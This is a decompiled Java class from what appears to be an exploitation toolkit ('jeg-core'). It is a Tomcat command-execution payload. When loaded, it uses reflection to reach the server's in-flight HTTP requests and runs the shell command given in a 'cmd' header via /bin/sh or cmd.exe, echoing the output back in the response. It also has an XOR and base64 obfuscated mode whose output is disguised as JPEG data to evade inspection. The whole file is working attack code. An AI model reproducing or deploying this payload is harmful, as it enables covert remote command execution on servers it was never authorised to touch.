package jeg.core.template.tomcat;

import flex.messaging.config.ConfigurationConstants;
import java.io.Writer;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.Scanner;
import org.apache.velocity.servlet.VelocityServlet;
import org.apache.xalan.xsltc.compiler.Constants;

/* loaded from: input_file:BOOT-INF/lib/jeg-core-1.0.0.jar:jeg/core/template/tomcat/TomcatCmdExecTpl.class */
public class TomcatCmdExecTpl {
    public TomcatCmdExecTpl() throws Exception {
        run();
    }

    private String getReqHeaderName() {
        return "cmd";
    }

    private void run() {
        Field declaredField;
        Field declaredField2;
        Field declaredField3;
        String str;
        try {
            Method declaredMethod = Thread.class.getDeclaredMethod("getThreads", new Class[0]);
            declaredMethod.setAccessible(true);
            Thread[] threadArr = (Thread[]) declaredMethod.invoke(null, new Object[0]);
            for (int i = 0; i < threadArr.length; i++) {
                if (threadArr[i].getName().contains("http") && threadArr[i].getName().contains("Acceptor")) {
                    Field declaredField4 = threadArr[i].getClass().getDeclaredField("target");
                    declaredField4.setAccessible(true);
                    Object obj = declaredField4.get(threadArr[i]);
                    try {
                        declaredField = obj.getClass().getDeclaredField(ConfigurationConstants.ENDPOINT_ELEMENT);
                    } catch (NoSuchFieldException e) {
                        declaredField = obj.getClass().getDeclaredField("this$0");
                    }
                    declaredField.setAccessible(true);
                    Object obj2 = declaredField.get(obj);
                    try {
                        declaredField2 = obj2.getClass().getDeclaredField(Constants.TRANSLET_OUTPUT_PNAME);
                    } catch (NoSuchFieldException e2) {
                        try {
                            declaredField2 = obj2.getClass().getSuperclass().getDeclaredField(Constants.TRANSLET_OUTPUT_PNAME);
                        } catch (NoSuchFieldException e3) {
                            declaredField2 = obj2.getClass().getSuperclass().getSuperclass().getDeclaredField(Constants.TRANSLET_OUTPUT_PNAME);
                        }
                    }
                    declaredField2.setAccessible(true);
                    Object obj3 = declaredField2.get(obj2);
                    try {
                        declaredField3 = obj3.getClass().getDeclaredField("global");
                    } catch (NoSuchFieldException e4) {
                        declaredField3 = obj3.getClass().getSuperclass().getDeclaredField("global");
                    }
                    declaredField3.setAccessible(true);
                    Object obj4 = declaredField3.get(obj3);
                    obj4.getClass().getClassLoader().loadClass("org.apache.coyote.RequestGroupInfo");
                    if (obj4.getClass().getName().contains("org.apache.coyote.RequestGroupInfo")) {
                        Field declaredField5 = obj4.getClass().getDeclaredField("processors");
                        declaredField5.setAccessible(true);
                        ArrayList arrayList = (ArrayList) declaredField5.get(obj4);
                        int i2 = 0;
                        while (true) {
                            if (i2 < arrayList.size()) {
                                Field declaredField6 = arrayList.get(i2).getClass().getDeclaredField(VelocityServlet.REQUEST);
                                declaredField6.setAccessible(true);
                                Object invoke = declaredField6.get(arrayList.get(i2)).getClass().getDeclaredMethod("getNote", Integer.TYPE).invoke(declaredField6.get(arrayList.get(i2)), 1);
                                try {
                                    str = (String) declaredField6.get(arrayList.get(i2)).getClass().getMethod("getHeader", String.class).invoke(declaredField6.get(arrayList.get(i2)), getReqHeaderName());
                                } catch (Exception e5) {
                                }
                                if (str != null) {
                                    Object invoke2 = invoke.getClass().getDeclaredMethod("getResponse", new Class[0]).invoke(invoke, new Object[0]);
                                    Writer writer = (Writer) invoke2.getClass().getMethod("getWriter", new Class[0]).invoke(invoke2, new Object[0]);
                                    writer.write(handle(str));
                                    writer.flush();
                                    writer.close();
                                    break;
                                }
                                i2++;
                            }
                        }
                    }
                }
            }
        } catch (Throwable th) {
        }
    }

    private static String exec(String str) {
        try {
            boolean z = true;
            String property = System.getProperty("os.name");
            if (property != null && property.toLowerCase().contains("win")) {
                z = false;
            }
            Scanner useDelimiter = new Scanner(Runtime.getRuntime().exec(z ? new String[]{"/bin/sh", "-c", str} : new String[]{"cmd.exe", "/c", str}).getInputStream()).useDelimiter("\\a");
            String str2 = "";
            while (useDelimiter.hasNext()) {
                str2 = str2 + useDelimiter.next();
            }
            return str2;
        } catch (Exception e) {
            return e.getMessage();
        }
    }

    /* JADX WARN: Multi-variable type inference failed */
    /* JADX WARN: Type inference failed for: r0v20, types: [int] */
    private static String handle(String str) throws Exception {
        if (!str.startsWith("eyJeXA")) {
            return exec(str);
        }
        int parseInt = Integer.parseInt(String.valueOf(str.charAt("eyJeXA".length())));
        char c = 0;
        for (int i = 0; i < parseInt; i++) {
            c += str.charAt("eyJeXA".length() + 1 + i);
        }
        return "/9j/4A" + base64Encode(x(exec(new String(x(base64Decode(str.substring("eyJeXA".length() + 1 + parseInt + c, str.indexOf(".")))))).getBytes())) + "/9k==";
    }

    private static byte[] base64Decode(String str) throws Exception {
        try {
            Class<?> cls = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) cls.getMethod("decodeBuffer", String.class).invoke(cls.newInstance(), str);
        } catch (Exception e) {
            Object invoke = Class.forName("java.util.Base64").getMethod("getDecoder", new Class[0]).invoke(null, new Object[0]);
            return (byte[]) invoke.getClass().getMethod("decode", String.class).invoke(invoke, str);
        }
    }

    public static String base64Encode(byte[] bArr) throws Exception {
        String str;
        try {
            Class<?> cls = Class.forName("java.util.Base64");
            Object invoke = cls.getMethod("getEncoder", (Class[]) null).invoke(cls, (Object[]) null);
            str = (String) invoke.getClass().getMethod("encodeToString", byte[].class).invoke(invoke, bArr);
        } catch (Exception e) {
            Object newInstance = Class.forName("sun.misc.BASE64Encoder").newInstance();
            str = (String) newInstance.getClass().getMethod("encode", byte[].class).invoke(newInstance, bArr);
        }
        return str;
    }

    public static byte[] x(byte[] bArr) {
        byte[] bytes = "???????????????".getBytes();
        byte[] bArr2 = new byte[bArr.length];
        for (int i = 0; i < bArr.length; i++) {
            bArr2[i] = (byte) (bArr[i] ^ bytes[i % bytes.length]);
        }
        return bArr2;
    }

    static {
        try {
            new TomcatCmdExecTpl();
        } catch (Exception e) {
        }
    }
}
